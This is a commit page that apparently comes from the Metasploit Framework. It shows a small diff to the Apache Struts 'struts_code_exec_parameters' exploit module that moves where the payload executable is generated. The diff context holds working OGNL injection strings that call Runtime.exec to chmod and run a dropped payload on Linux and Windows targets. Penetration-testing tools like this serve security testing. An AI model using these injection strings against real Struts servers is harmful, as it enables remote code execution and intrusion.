Land #10038, struts_code_exec_parameters EXE fix

rapid7 · May 17, 2018 · 012de0f · 012de0f
1 parent cbac801
commit 012de0f
Showing 1 changed file with 2 additions and 1 deletion.
diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -117,12 +117,12 @@ def execute_command(cmd)
   def exploit
     #Set up generic values.
     payload_exe = rand_text_alphanumeric(4 + rand(4))
-    pl_exe = generate_payload_exe
 
     append = false
     #Now arch specific...
     case target['Platform']
     when 'linux'
+      pl_exe = generate_payload_exe
       path = temp_path || '/tmp/'
       payload_exe = "#{path}#{payload_exe}"
       chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
@@ -140,6 +140,7 @@ def exploit
       exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
       exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
     when 'win'
+      pl_exe = generate_payload_exe
       path = temp_path || './'
       payload_exe = "#{path}#{payload_exe}.exe"
       exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"